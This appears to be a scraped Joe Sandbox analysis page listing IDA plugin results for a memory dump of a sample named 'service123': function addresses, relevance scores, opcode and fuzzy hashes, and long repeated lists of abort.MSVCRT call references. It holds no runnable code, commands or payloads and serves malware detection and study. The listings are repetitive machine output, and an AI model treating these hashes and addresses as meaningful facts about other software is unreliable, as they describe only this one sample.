Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 41fd9fea44fe0a2a70cbf5afe0cadee67a824c6fc95655300951b6aafd3b3e54
Instruction ID: 082da8b227bd78468b621c5a833eff3e4bf52033cfbc3588ddee8c0c8ebf36e5
Opcode Fuzzy Hash: 41fd9fea44fe0a2a70cbf5afe0cadee67a824c6fc95655300951b6aafd3b3e54
Instruction Fuzzy Hash: 880124B2606201CFE708EF28E891F56B7B0FB11309F009A48C184CBB15D738E828CFA5

Function 6C3828BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6be633cde570655ec1c566d4a0eb84eccb4e473a3ccfe152bd3ddc69d53ad878
Instruction ID: 729b32a9db7d665812a3b3e49a0cbe8fca8a852c9ba728c038b21a4e917b38f1
Opcode Fuzzy Hash: 6be633cde570655ec1c566d4a0eb84eccb4e473a3ccfe152bd3ddc69d53ad878
Instruction Fuzzy Hash: 160114B2606201CFE709EF18D491F6AB7B0FB12309F51AA48C5859BB15D735E828CF95

Function 6C382A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 757994156412d75321dd983f47e1a72cc20678f02cad4f6bfbb69ebfe72a4513
Instruction ID: 07604202b52f814d553ebba9e602369bd1782cb321d5e0c7bfc052c804ffd221
Opcode Fuzzy Hash: 757994156412d75321dd983f47e1a72cc20678f02cad4f6bfbb69ebfe72a4513
Instruction Fuzzy Hash: 2F0137B1506201CFE705EF18D491F6AB7B0FB12309F119A48C1849BB05D735E828CF95

Function 6C382B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3b760b95250fb0308a2ec71450de16c1ff7c1211adc0514d09875642630eb515
Instruction ID: 715298147953d01fd4a6e65729bceb5254c3ba111bbb60af28a70761cd4406f6
Opcode Fuzzy Hash: 3b760b95250fb0308a2ec71450de16c1ff7c1211adc0514d09875642630eb515
Instruction Fuzzy Hash: 3DF037B150A601CBE705EF18D490F66B7B0FB02349F119A48C0959BB05D775E428CF91

Function 6C3829B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0e060d53730eb1d69bf4813d6c0b16e72b163fe20cb20a6a55265955a1d7eb32
Instruction ID: b8c079e801be422410049b7916a071f33bbe1f61501932cf63ae7f4b434ed6cd
Opcode Fuzzy Hash: 0e060d53730eb1d69bf4813d6c0b16e72b163fe20cb20a6a55265955a1d7eb32
Instruction Fuzzy Hash: A6F0F4B1506602CBE715EF18D094FAAB7B1FB0234CF11AA48C4559BB0AD775E428CF95

Function 6C382AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 96b524ea7a4d530db7dc47bbcd80e78ef51c6dd612a24e52e0b6396904e474fe
Instruction ID: 1cf4ba41b9823a579f3627f65176ca7041e66937685badb1fec2dbd6d702cd21
Opcode Fuzzy Hash: 96b524ea7a4d530db7dc47bbcd80e78ef51c6dd612a24e52e0b6396904e474fe
Instruction Fuzzy Hash: 99F017B15096028BD715EF18D090FAAB771FF02348F51AA48C4459BB06D771E428CFD5

Function 6C38B930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 02aa4c2d282e002f01dc5ecdf98d7a42fec4ac6e11b6c5a1f6f0cb76df32be64
Instruction ID: 8e4bd73ea0b01ab2197e752f3dacd7b87eb03a9752b77a59f3fb84f7f6508a43
Opcode Fuzzy Hash: 02aa4c2d282e002f01dc5ecdf98d7a42fec4ac6e11b6c5a1f6f0cb76df32be64
Instruction Fuzzy Hash: C831253020A70A9FC300CE59C8C1797F3E5EB4635CF44892ADA998FB52E3359828DF91

Function 6C38BFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 37923bcd523c26d0333ef639fdbae34141e18e0885eb8746b311f41f9b6a8924
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
